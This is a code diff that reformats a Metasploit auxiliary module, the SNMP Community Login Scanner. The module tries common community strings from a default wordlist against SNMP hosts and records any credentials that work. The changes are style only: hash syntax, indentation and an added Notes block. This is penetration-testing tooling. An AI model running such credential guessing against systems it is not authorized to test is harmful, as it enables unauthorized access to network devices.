@@ -13,40 +13,45 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'SNMP Community Login Scanner',
+      'Name' => 'SNMP Community Login Scanner',
       'Description' => %q{
         This module logs in to SNMP devices using common community names.
       },
-      'Author'      => 'hdm',
-      'References'     =>
-        [
-          [ 'CVE', '1999-0508' ], # Weak password
-          [ 'CVE', '1999-0517' ],
-          [ 'CVE', '1999-0516' ],
-        ],
-      'License'     => MSF_LICENSE
+      'Author' => 'hdm',
+      'References' => [
+        [ 'CVE', '1999-0508' ], # Weak password
+        [ 'CVE', '1999-0517' ],
+        [ 'CVE', '1999-0516' ],
+      ],
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     register_options(
-    [
-      Opt::RPORT(161),
-      OptEnum.new('PROTOCOL', [true, 'The SNMP protocol to use', 'udp', ['udp', 'tcp']]),
-      OptEnum.new('VERSION', [true, 'The SNMP version to scan', '1', ['1', '2c', 'all']]),
-      OptString.new('PASSWORD', [ false, 'The password to test' ]),
-      OptPath.new('PASS_FILE',  [ false, "File containing communities, one per line",
-        File.join(Msf::Config.data_directory, "wordlists", "snmp_default_pass.txt")
-      ])
-    ])
+      [
+        Opt::RPORT(161),
+        OptEnum.new('PROTOCOL', [true, 'The SNMP protocol to use', 'udp', ['udp', 'tcp']]),
+        OptEnum.new('VERSION', [true, 'The SNMP version to scan', '1', ['1', '2c', 'all']]),
+        OptString.new('PASSWORD', [ false, 'The password to test' ]),
+        OptPath.new('PASS_FILE', [
+          false, 'File containing communities, one per line',
+          File.join(Msf::Config.data_directory, 'wordlists', 'snmp_default_pass.txt')
+        ])
+      ]
+    )
 
     deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE')
   end
 
   # Operate on a single host so that we can take advantage of multithreading
   def run_host(ip)
-
     collection = Metasploit::Framework::CommunityStringCollection.new(
-        pass_file: datastore['PASS_FILE'],
-        password: datastore['PASSWORD']
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD']
     )
 
     scanner = Metasploit::Framework::LoginScanner::SNMP.new(
@@ -67,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary
     scanner.scan! do |result|
       credential_data = result.to_h
       credential_data.merge!(
-          module_fullname: self.fullname,
-          workspace_id: myworkspace_id
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
       )
       if result.success?
         credential_core = create_credential(credential_data)
@@ -77,12 +82,12 @@ class MetasploitModule < Msf::Auxiliary
 
         print_good "#{ip}:#{rport} - Login Successful: #{result.credential} (Access level: #{result.access_level}); Proof (sysDescr.0): #{result.proof}"
         report_service(
-          :host  => ip,
-          :port  => rport,
-          :proto => 'udp',
-          :name  => 'snmp',
-          :info  => result.proof,
-          :state => 'open'
+          host: ip,
+          port: rport,
+          proto: 'udp',
+          name: 'snmp',
+          info: result.proof,
+          state: 'open'
         )
       else
         invalidate_login(credential_data)
@@ -99,7 +104,4 @@ class MetasploitModule < Msf::Auxiliary
     datastore['PROTOCOL']
   end
 
-
-
-
 end
